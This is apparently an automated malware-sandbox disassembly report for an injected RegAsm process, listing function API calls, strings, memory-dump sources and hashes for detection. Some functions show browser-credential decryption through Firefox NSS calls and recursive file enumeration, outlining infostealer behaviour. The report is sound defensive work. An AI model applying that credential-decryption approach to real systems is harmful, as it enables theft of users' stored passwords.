                                                                                                                                                                                                                                                                                                  Function 00417140 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 159stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041716E
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00417175
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041718E
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004171A5
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276BC), ref: 004171DC
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276C0), ref: 004171F2
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00417210
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00417268
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00417277
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8D8), ref: 0041729B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01571980), ref: 004172AF
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 004172B9
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 004172C7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Find$FileHeaplstrcatlstrlenwsprintf$AllocCloseFirstNextProcess
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                                                                  • API String ID: 1803110163-2848263008
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c642167a6290580b630f387f52ebb509a17423caf3bec4ba48deea40bc4f230
                                                                                                                                                                                                                                                                                                  • Instruction ID: dbd6ffb95f0b046b2f2b534e4af8bb74dadcf752387ee3bb10109dd6a12b6fb9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c642167a6290580b630f387f52ebb509a17423caf3bec4ba48deea40bc4f230
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C51C4B1900318ABDB10EFA4DC49FEE7779AF49704F00469DFA15A3290DB789B44CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C81ED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C81EE7A
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C81EFB5
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C821695
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8216B4
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C821770
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C821A3E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3693777188-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 79e6425f70e5b6b901b9ab8337b7caead713b01b6231ba63bb53c3065f150d41
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8af1727e45d3106396a85578f1b44ab23f5f7e96dd315b238393c51748b702cf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79e6425f70e5b6b901b9ab8337b7caead713b01b6231ba63bb53c3065f150d41
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EB36B71E0021ACFCB24CFA8C994A9DB7B2FF49304F2585A9D449AB745D734AD86CF90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C837E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID: (pre-xul)$data$name$schema
                                                                                                                                                                                                                                                                                                  • API String ID: 3412268980-999448898
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d1770724f2546f681a0089b9a36c529da11e7daf5fc8e7a57ccbf3ccd042fc9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1cd219a1a41e6cb07ad17a70691d8248b776992c69778bdab47981a38436dc00
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d1770724f2546f681a0089b9a36c529da11e7daf5fc8e7a57ccbf3ccd042fc9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68E18E71B043508FC720CF69894065BFBEABB85314F558E2DE899D7B80EB70DD498B91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C81D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D4F2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D50B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FCFE0: EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7FCFF6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FCFE0: LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7FD026
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D52E
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E7DC), ref: 6C81D690
                                                                                                                                                                                                                                                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C81D6A6
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E7DC), ref: 6C81D712
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D751
                                                                                                                                                                                                                                                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C81D7EA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                                                  • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                                                  • Opcode ID: 54f8285df887f373432cbbf5f3a15470946689170bc6bb1e03e2f16dae8c540c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9f159dfdb69e88255d3c52130d8f6a768668dff4ea01d39598b5d4f713fa2219
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54f8285df887f373432cbbf5f3a15470946689170bc6bb1e03e2f16dae8c540c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3491B371A087168FD736CF28C29476AB7E1EB86318F144D2ED55A87F81E734E844CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00409230 Relevance: 16.6, APIs: 11, Instructions: 98stringencryptionCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409259
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(004095B3,00000001,?,00001FA0,00000000,00000000,?,004095B3), ref: 00409276
                                                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(004095B3,00000000,?,004095B3), ref: 0040927E
                                                                                                                                                                                                                                                                                                  • PK11_GetInternalKeySlot.NSS3(?,004095B3), ref: 0040928C
                                                                                                                                                                                                                                                                                                  • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,004095B3), ref: 004092A1
                                                                                                                                                                                                                                                                                                  • PK11SDR_Decrypt.NSS3(00000000,?,00000000), ref: 004092D5
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004092F1
                                                                                                                                                                                                                                                                                                  • PK11_FreeSlot.NSS3 ref: 0040930B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00426A96,00426A9A), ref: 0040932D
                                                                                                                                                                                                                                                                                                  • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420838), ref: 00409334
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00426A96,00426A9B), ref: 0040934F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: K11_$Slot$Freelstrcat$AuthenticateBinaryCryptDecryptInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2752138542-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 472110f76bcdfad576340373058a46c9ac265d00be6a9e00da931ded4c83ee63
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a69d43a006cb6cd32b20143b9085461888a4fab223af96bb3b9a332de00be65
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 472110f76bcdfad576340373058a46c9ac265d00be6a9e00da931ded4c83ee63
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31E675B00219ABDB10DF88EC05BEE7779EF49705F14407AFA08B6280D7B46A058BA9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C854EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 6C854EFF
                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C854F2E
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE ref: 6C854F52
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000), ref: 6C854F62
                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8552B2
                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8552E6
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000010), ref: 6C855481
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C855498
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                                                                  • API String ID: 4104871533-3887548279
                                                                                                                                                                                                                                                                                                  • Opcode ID: eca3cfe4577ca55d6b02fff610a59a01f85312d1089f320acac4890cb07d6f49
                                                                                                                                                                                                                                                                                                  • Instruction ID: 22c15bac81896ddec6aef261d37e618d605a762aed88346645fdd05d30a34221
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eca3cfe4577ca55d6b02fff610a59a01f85312d1089f320acac4890cb07d6f49
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CF1D271A18B108FC727CF39C85062BB7F5AFD6288F458B2EF846A7651EB719441CB81
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040A980 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 470fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00426AB3,?,?,00000010), ref: 0040A9F3
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CC8), ref: 0040AA6C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CCC), ref: 0040AA86
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$FileFindFirstlstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: #$\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 1618123633-1611066409
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a8ec05f244c86406a8fe8979b7f854254d8865f4acec3e6b9b417325801ff64
                                                                                                                                                                                                                                                                                                  • Instruction ID: ced4800e6e760bbc3ca27c8dc2d2998dd4273cc07fb5b6c4be82cfcfc02e7abf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a8ec05f244c86406a8fe8979b7f854254d8865f4acec3e6b9b417325801ff64
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D125371801149EACB15EBA1C951BDEBB78AF15304F5040BEE606735D2DF782B4CCBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C842C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C842C31
                                                                                                                                                                                                                                                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C842C61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7F4E5A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C7F4E97
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C842C82
                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C842E2D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8081B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C8081DE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                                                                                                  • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                                                                  • API String ID: 801438305-4149320968
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1b12a875881d29122a30a4d504fd22471b861fdbe19aa639b45068ac0d54df03
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4e019622f5848ad628e4ae33f09385c69f9f69666b810df909d70b2f7fe2f871
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b12a875881d29122a30a4d504fd22471b861fdbe19aa639b45068ac0d54df03
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8091C0706087488FD734CF28C58469EB7E0AFC9358F508D2EE59A87751EB34D949CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C859E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                                  • String ID: -Infinity$NaN
                                                                                                                                                                                                                                                                                                  • API String ID: 3839614884-2141177498
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f689a73b4c1322d0e45649c8d974d4b867c440feb69863c694c38d36285c505
                                                                                                                                                                                                                                                                                                  • Instruction ID: 31e8774cd27793394bd403c00a0f01cc519e94be9315ec705b762e91892c4469
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f689a73b4c1322d0e45649c8d974d4b867c440feb69863c694c38d36285c505
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6C1B671E00319CBDB24CF98C9947EEB7B6BF84704F94492DD406ABB40D7B1A949CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0041BBB7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
